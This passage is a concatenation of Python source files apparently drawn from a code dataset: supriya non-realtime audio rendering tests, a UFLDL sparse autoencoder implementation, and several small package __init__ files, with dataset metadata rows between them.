nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(buffer_one_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(buffer_one_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
pytest.helpers.assert_soundfile_ok(buffer_two_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(buffer_two_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [-0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
0.41: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
0.61: [-0.75, -0.75, -0.75, -0.75, -0.75, -0.75, -0.75, -0.75],
0.81: [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0],
0.99: [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0],
}
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125],
0.41: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.61: [0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375],
0.81: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.99: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-5657353b9c5dcd1e807fb6bf9919e1f4
source:
- session-a9bccd241b0e5b56d123924992fbdc05
- session-7b3f85710f19667f73f745b8ac8080a0
"""
)
def test_08(nonrealtime_paths):
"""
Fanned Session DiskIn input and NRT input.
"""
session_one = pytest.helpers.make_test_session(multiplier=0.25)
session_two = supriya.nonrealtime.Session(name="middle-session")
session_three = supriya.nonrealtime.Session(name="outer-session")
diskin_synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
with session_two.at(0):
buffer_one = session_two.cue_soundfile(session_one, duration=10)
buffer_two = session_two.cue_soundfile(session_one, duration=10)
session_two.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_one, duration=10
)
session_two.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_two, duration=10
)
with session_three.at(0):
buffer_one = session_three.cue_soundfile(session_one, duration=10)
buffer_two = session_three.cue_soundfile(session_two, duration=10)
session_three.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_one, duration=10
)
session_three.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_two, duration=10
)
assert session_one.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(pytest.helpers.build_dc_synthdef(8).compile())],
["/s_new", "b47278d408f17357f6b260ec30ea213d", 1000, 0, 0, "source", 0],
],
],
[2.0, [["/n_set", 1000, "source", 0.0625]]],
[4.0, [["/n_set", 1000, "source", 0.125]]],
[6.0, [["/n_set", 1000, "source", 0.1875]]],
[8.0, [["/n_set", 1000, "source", 0.25]]],
[10.0, [["/n_free", 1000], [0]]],
]
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(diskin_synthdef.compile())],
["/b_alloc", 0, 32768, 8],
["/b_alloc", 1, 32768, 8],
[
"/b_read",
0,
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff",
0,
-1,
0,
1,
],
[
"/b_read",
1,
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1001,
0,
0,
"buffer_id",
1,
],
],
],
[
10.0,
[
["/n_free", 1000, 1001],
["/b_close", 0],
["/b_free", 0],
["/b_close", 1],
["/b_free", 1],
[0],
],
],
]
assert session_three.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(diskin_synthdef.compile())],
["/b_alloc", 0, 32768, 8],
["/b_alloc", 1, 32768, 8],
[
"/b_read",
0,
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff",
0,
-1,
0,
1,
],
[
"/b_read",
1,
"session-81d02f16aff7797ca3ac041facb61b95.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1001,
0,
0,
"buffer_id",
1,
],
],
],
[
10.0,
[
["/n_free", 1000, 1001],
["/b_close", 0],
["/b_free", 0],
["/b_close", 1],
["/b_free", 1],
[0],
],
],
]
session_one_path = nonrealtime_paths.render_directory_path.joinpath(
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff"
)
session_two_path = nonrealtime_paths.render_directory_path.joinpath(
"session-81d02f16aff7797ca3ac041facb61b95.aiff"
)
exit_code, _ = session_three.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(session_one_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(session_one_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625],
0.41: [0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125],
0.61: [0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875],
0.81: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.99: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
}
pytest.helpers.assert_soundfile_ok(session_two_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(session_two_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125],
0.41: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.61: [0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375],
0.81: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.99: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
}
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875],
0.41: [0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375],
0.61: [0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625],
0.81: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.99: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
}
executable = os.environ.get("SCSYNTH_PATH", "scsynth")
assert session_three.transcript == [
"Writing session-c6d86f3d482a8bac1f7cc6650017da8e.osc.",
" Wrote session-c6d86f3d482a8bac1f7cc6650017da8e.osc.",
"Rendering session-c6d86f3d482a8bac1f7cc6650017da8e.osc.",
f" Command: {executable} -N session-c6d86f3d482a8bac1f7cc6650017da8e.osc _ session-c6d86f3d482a8bac1f7cc6650017da8e.aiff 44100 aiff int24",
" Rendered session-c6d86f3d482a8bac1f7cc6650017da8e.osc with exit code 0.",
"Writing session-81d02f16aff7797ca3ac041facb61b95.osc.",
" Wrote session-81d02f16aff7797ca3ac041facb61b95.osc.",
"Rendering session-81d02f16aff7797ca3ac041facb61b95.osc.",
f" Command: {executable} -N session-81d02f16aff7797ca3ac041facb61b95.osc _ session-81d02f16aff7797ca3ac041facb61b95.aiff 44100 aiff int24",
" Rendered session-81d02f16aff7797ca3ac041facb61b95.osc with exit code 0.",
"Writing session-1d80bd5d7da1eb8c25d322aa85384513.osc.",
" Wrote session-1d80bd5d7da1eb8c25d322aa85384513.osc.",
"Rendering session-1d80bd5d7da1eb8c25d322aa85384513.osc.",
f" Command: {executable} -N session-1d80bd5d7da1eb8c25d322aa85384513.osc _ session-1d80bd5d7da1eb8c25d322aa85384513.aiff 44100 aiff int24",
" Rendered session-1d80bd5d7da1eb8c25d322aa85384513.osc with exit code 0.",
"Writing output/render.yml.",
" Wrote output/render.yml.",
]
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-1d80bd5d7da1eb8c25d322aa85384513
source:
- session-81d02f16aff7797ca3ac041facb61b95
- session-c6d86f3d482a8bac1f7cc6650017da8e
"""
)
def test_09(nonrealtime_paths):
"""
Non-session renderable NRT input.
"""
say = supriya.soundfiles.Say("Some text.")
session = supriya.nonrealtime.Session(1, 1, input_=say)
synthdef = pytest.helpers.build_multiplier_synthdef(1)
with session.at(0):
session.add_synth(
synthdef=synthdef,
duration=2,
in_bus=session.audio_input_bus_group,
out_bus=session.audio_output_bus_group,
multiplier=0.5,
)
assert session.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
[
"/s_new",
"85c1d1b6f6c9b59c042b53d39019b8f5",
1000,
0,
0,
"in_bus",
1,
"multiplier",
0.5,
"out_bus",
0,
],
],
],
[2.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-ea2ca28c15208db4fce5eb184d0b9257
source:
- say-5f2b51ca2fdc5baa31ec02e002f69aec
"""
)
def test_10(nonrealtime_paths):
"""
Non-session renderable DiskIn input.
"""
say = supriya.soundfiles.Say("Some text.")
session = supriya.nonrealtime.Session(0, 1)
synthdef = pytest.helpers.build_diskin_synthdef(channel_count=1)
with session.at(0):
buffer_ = session.cue_soundfile(say, duration=2)
session.add_synth(synthdef=synthdef, buffer_id=buffer_, duration=2)
assert session.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
["/b_alloc", 0, 32768, 1],
[
"/b_read",
0,
"say-5f2b51ca2fdc5baa31ec02e002f69aec.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"9c69c44ff72c62dfa4c2f0a0e99f05ce",
1000,
0,
0,
"buffer_id",
0,
],
],
],
[2.0, [["/n_free", 1000], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-96c65c92f6d0d0bbb08d85720d16a383
source:
- say-5f2b51ca2fdc5baa31ec02e002f69aec
"""
)
def test_11(nonrealtime_paths):
"""
Chained session and non-session inputs.
"""
multiplier_synthdef = pytest.helpers.build_multiplier_synthdef(1)
diskin_synthdef = pytest.helpers.build_diskin_synthdef(channel_count=1)
say = supriya.soundfiles.Say("Some text.")
session_one = supriya.nonrealtime.Session(1, 1, input_=say)
with session_one.at(0):
session_one.add_synth(
synthdef=multiplier_synthdef,
duration=2,
in_bus=session_one.audio_input_bus_group,
out_bus=session_one.audio_output_bus_group,
multiplier=0.5,
)
session_two = supriya.nonrealtime.Session(1, 1, input_=session_one)
with session_two.at(0):
session_two.add_synth(
synthdef=multiplier_synthdef,
duration=2,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
buffer_ = session_two.cue_soundfile(say, duration=2)
session_two.add_synth(synthdef=diskin_synthdef, buffer_id=buffer_, duration=2)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(multiplier_synthdef.compile())],
["/d_recv", bytearray(diskin_synthdef.compile())],
["/b_alloc", 0, 32768, 1],
[
"/b_read",
0,
"say-5f2b51ca2fdc5baa31ec02e002f69aec.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"85c1d1b6f6c9b59c042b53d39019b8f5",
1000,
0,
0,
"in_bus",
1,
"multiplier",
-0.5,
"out_bus",
0,
],
[
"/s_new",
"9c69c44ff72c62dfa4c2f0a0e99f05ce",
1001,
0,
0,
"buffer_id",
0,
],
],
],
[2.0, [["/n_free", 1000, 1001], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session_two.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-9d80db1d391da3ab4f1cab54a0963d44
source:
- session-ea2ca28c15208db4fce5eb184d0b9257
- say-5f2b51ca2fdc5baa31ec02e002f69aec
"""
)
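The transcript assertions in `test_08` spell out exactly how each intermediate session is rendered on the command line. As a hedged sketch (this helper and its name are illustrative, not supriya's actual API), the invocation those transcripts show can be reconstructed like this:

```python
import os

def build_nrt_command(osc_path, output_path, sample_rate=44100,
                      header_format="aiff", sample_format="int24"):
    """Rebuild the scsynth non-realtime command shown in the transcripts."""
    executable = os.environ.get("SCSYNTH_PATH", "scsynth")
    # -N puts scsynth in non-realtime mode; "_" stands in for "no input soundfile".
    return (f"{executable} -N {osc_path} _ {output_path} "
            f"{sample_rate} {header_format} {sample_format}")

command = build_nrt_command("session-abc.osc", "session-abc.aiff")
```

The `-N` score-file mode and the argument order match the `Command:` lines asserted in `session_three.transcript` above.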
# File: lahja/tools/benchmark/__init__.py (repo: gsalgado/lahja, license: MIT)
from .stats import LocalStatistic  # noqa: F401
# File: sparse_autoencoder.py (repo: kaixinhuaihuai/ufldl_tutorial, license: MIT)
import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def sigmoid_prime(x):
return sigmoid(x) * (1 - sigmoid(x))
def KL_divergence(x, y):
return x * np.log(x / y) + (1 - x) * np.log((1 - x) / (1 - y))
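The KL term above drives each hidden unit's average activation toward the sparsity target: it is exactly zero when the activation matches the target and grows as the two diverge. A quick numeric check (the values 0.05 and 0.5 are chosen arbitrarily, and the formula is restated so the snippet is self-contained):

```python
import numpy as np

def kl_divergence(x, y):
    # Same formula as KL_divergence above.
    return x * np.log(x / y) + (1 - x) * np.log((1 - x) / (1 - y))

at_target = kl_divergence(0.05, 0.05)   # rho_hat equals rho: no penalty
off_target = kl_divergence(0.05, 0.5)   # unit is far too active: large penalty
```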
def initialize(hidden_size, visible_size):
# we'll choose weights uniformly from the interval [-r, r]
r = np.sqrt(6) / np.sqrt(hidden_size + visible_size + 1)
W1 = np.random.random((hidden_size, visible_size)) * 2 * r - r
W2 = np.random.random((visible_size, hidden_size)) * 2 * r - r
b1 = np.zeros(hidden_size, dtype=np.float64)
b2 = np.zeros(visible_size, dtype=np.float64)
theta = np.concatenate((W1.reshape(hidden_size * visible_size),
W2.reshape(hidden_size * visible_size),
b1.reshape(hidden_size),
b2.reshape(visible_size)))
return theta
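`initialize` packs all four parameter arrays into one flat vector because minFunc-style optimizers expect a single 1-D argument. The layout is `[W1, W2, b1, b2]`, so the vector has `2 * hidden_size * visible_size + hidden_size + visible_size` entries, and unpacking is just a pair of reshapes. A small self-contained check of that round trip:

```python
import numpy as np

hidden_size, visible_size = 25, 64
r = np.sqrt(6) / np.sqrt(hidden_size + visible_size + 1)
W1 = np.random.random((hidden_size, visible_size)) * 2 * r - r
W2 = np.random.random((visible_size, hidden_size)) * 2 * r - r
theta = np.concatenate((W1.ravel(), W2.ravel(),
                        np.zeros(hidden_size), np.zeros(visible_size)))

# Unpacking mirrors what sparse_autoencoder_cost does below.
W1_back = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
expected_size = 2 * hidden_size * visible_size + hidden_size + visible_size
```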
# visible_size: the number of input units (probably 64)
# hidden_size: the number of hidden units (probably 25)
# lambda_: weight decay parameter
# sparsity_param: The desired average activation for the hidden units (denoted in the lecture
# notes by the greek alphabet rho, which looks like a lower-case "p").
# beta: weight of sparsity penalty term
# data: Our 64x10000 matrix containing the training data. So, data(:,i) is the i-th training example.
#
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
# Returns: (cost,gradient) tuple
def sparse_autoencoder_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
# Number of training examples
m = data.shape[1]
# Forward propagation
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = sigmoid(z3)
# Sparsity
rho_hat = np.sum(a2, axis=1) / m
rho = np.tile(sparsity_param, hidden_size)
# Cost function
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2)) + \
beta * np.sum(KL_divergence(rho, rho_hat))
# Backprop
sparsity_delta = np.tile(- rho / rho_hat + (1 - rho) / (1 - rho_hat), (m, 1)).transpose()
delta3 = -(data - h) * sigmoid_prime(z3)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
# After computing the cost and gradient, we will convert the gradients back
# to a vector format (suitable for minFunc). Specifically, we will unroll
# your gradient matrices into a vector.
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
def sparse_autoencoder(theta, hidden_size, visible_size, data):
"""
:param theta: trained weights from the autoencoder
:param hidden_size: the number of hidden units (probably 25)
:param visible_size: the number of input units (probably 64)
:param data: Our matrix containing the training data as columns. So, data(:,i) is the i-th training example.
"""
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
# Number of training examples
m = data.shape[1]
# Forward propagation
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
return a2
# visible_size: the number of input units (probably 64)
# hidden_size: the number of hidden units (probably 25)
# lambda_: weight decay parameter
# sparsity_param: The desired average activation for the hidden units (denoted in the lecture
# notes by the greek alphabet rho, which looks like a lower-case "p").
# beta: weight of sparsity penalty term
# data: Our 64x10000 matrix containing the training data. So, data(:,i) is the i-th training example.
#
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
# Returns: (cost,gradient) tuple
def sparse_autoencoder_linear_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
# Number of training examples
m = data.shape[1]
# Forward propagation
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = z3
# Sparsity
rho_hat = np.sum(a2, axis=1) / m
rho = np.tile(sparsity_param, hidden_size)
# Cost function
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2)) + \
beta * np.sum(KL_divergence(rho, rho_hat))
# Backprop
sparsity_delta = np.tile(- rho / rho_hat + (1 - rho) / (1 - rho_hat), (m, 1)).transpose()
delta3 = -(data - h)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
# After computing the cost and gradient, we will convert the gradients back
# to a vector format (suitable for minFunc). Specifically, we will unroll
# your gradient matrices into a vector.
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
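Both cost functions above return `(cost, grad)` pairs for a minFunc-style optimizer, so the analytic gradient has to agree with finite differences. The following self-contained check restates the sigmoid-output cost at toy sizes (all `_`-prefixed helpers are local to this snippet, not part of the module) and compares its backprop gradient against central differences:

```python
import numpy as np

def _sigmoid(x):
    return 1 / (1 + np.exp(-x))

def _kl(x, y):
    return x * np.log(x / y) + (1 - x) * np.log((1 - x) / (1 - y))

def _cost_grad(theta, v, h, lam, sp, beta, data):
    # Unpack [W1, W2, b1, b2] exactly as sparse_autoencoder_cost does.
    W1 = theta[0:h * v].reshape(h, v)
    W2 = theta[h * v:2 * h * v].reshape(v, h)
    b1 = theta[2 * h * v:2 * h * v + h]
    b2 = theta[2 * h * v + h:]
    m = data.shape[1]
    a2 = _sigmoid(W1 @ data + b1[:, None])
    out = _sigmoid(W2 @ a2 + b2[:, None])
    rho_hat = a2.sum(axis=1) / m
    rho = np.full(h, sp)
    cost = (((out - data) ** 2).sum() / (2 * m)
            + (lam / 2) * ((W1 ** 2).sum() + (W2 ** 2).sum())
            + beta * _kl(rho, rho_hat).sum())
    sparsity_delta = (-rho / rho_hat + (1 - rho) / (1 - rho_hat))[:, None]
    delta3 = -(data - out) * out * (1 - out)   # sigmoid'(z3) = out * (1 - out)
    delta2 = (W2.T @ delta3 + beta * sparsity_delta) * a2 * (1 - a2)
    grad = np.concatenate((
        (delta2 @ data.T / m + lam * W1).ravel(),
        (delta3 @ a2.T / m + lam * W2).ravel(),
        delta2.sum(axis=1) / m,
        delta3.sum(axis=1) / m,
    ))
    return cost, grad

rng = np.random.RandomState(0)
v, h, m = 5, 3, 10
data = rng.rand(v, m)
r = np.sqrt(6.0 / (v + h + 1))
theta = rng.uniform(-r, r, 2 * h * v + h + v)
_, grad = _cost_grad(theta, v, h, 1e-4, 0.1, 3.0, data)

# Central finite differences over every parameter.
eps = 1e-5
numgrad = np.zeros_like(theta)
for i in range(theta.size):
    step = np.zeros_like(theta)
    step[i] = eps
    plus, _ = _cost_grad(theta + step, v, h, 1e-4, 0.1, 3.0, data)
    minus, _ = _cost_grad(theta - step, v, h, 1e-4, 0.1, 3.0, data)
    numgrad[i] = (plus - minus) / (2 * eps)

rel_error = np.linalg.norm(numgrad - grad) / np.linalg.norm(numgrad + grad)
```

With float64 and these sizes the relative error should be far below 1e-6; a larger value would indicate a bug in the backprop terms.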
# File: python/anyascii/_data/_1ec.py (repo: casept/anyascii, license: ISC)
b=' Rs'
# File: nisnap/__init__.py (repo: jhuguetn/nisnap, license: MIT)
__version__ = '0.3.7.post1'
from nisnap import snap
from nisnap import xnat
from nisnap.snap import plot_segment
__all__ = ['snap', 'xnat']
# File: app/models/neural_one_layer/__init__.py (repo: carbonpredict/carbonpredict, license: MIT)
from .impl import NeuralNetworkOneLayerFF
# File: zxsegmentation/models/__init__.py (repo: haofengsiji/zxsegmentation, license: Apache-2.0)
from .fcn_model import vgg16, fcn32, fcn16, fcn8
# File: torchexpo/nlp/__init__.py (repo: torchexpo/torchexpo, license: Apache-2.0)
from torchexpo.nlp import sentiment_analysis
# File: WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_random_Numbers.txt.py (repo: webdevhub42/Lambda, license: MIT)
import random
print(random.randrange(1, 10))
| 11.5 | 30 | 0.76087 | 7 | 46 | 5 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 0.108696 | 46 | 3 | 31 | 15.333333 | 0.780488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
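The snippet above prints `random.randrange(1, 10)`. A minimal standard-library sketch showing that the stop bound is exclusive, so 10 is never drawn (`random.randint(1, 10)` would include it):

```python
import random

# randrange(1, 10) samples uniformly from [1, 10): the stop value is exclusive.
random.seed(0)  # fixed seed so repeated runs give the same draws
values = [random.randrange(1, 10) for _ in range(1000)]
assert 1 <= min(values) and max(values) <= 9  # 10 never appears
```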
8ee9d9b0f9a4ea5f8552683462f90d52da39aea3 | 90 | py | Python | tensor/main_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | tensor/main_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | tensor/main_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | from tensor.struct.tensor_module import Tensor
from tensor.tostring_module import Tensor
| 22.5 | 46 | 0.866667 | 13 | 90 | 5.846154 | 0.461538 | 0.263158 | 0.473684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 90 | 3 | 47 | 30 | 0.938272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d97eada3d7e3e909f80cf879b310862337d98ebe | 63 | py | Python | afqbrowser/__init__.py | dweiss044/AFQ-Browser | e4c47a88d9e179999d51045af6be65391f250f86 | [
"BSD-3-Clause"
] | 30 | 2017-02-10T13:12:09.000Z | 2021-11-02T14:51:20.000Z | afqbrowser/__init__.py | dweiss044/AFQ-Browser | e4c47a88d9e179999d51045af6be65391f250f86 | [
"BSD-3-Clause"
] | 239 | 2016-09-21T22:16:25.000Z | 2021-06-22T05:37:23.000Z | afqbrowser/__init__.py | dweiss044/AFQ-Browser | e4c47a88d9e179999d51045af6be65391f250f86 | [
"BSD-3-Clause"
] | 9 | 2016-10-10T21:15:22.000Z | 2021-06-03T16:04:06.000Z | from .browser import * # noqa
from .gh_pages import * # noqa
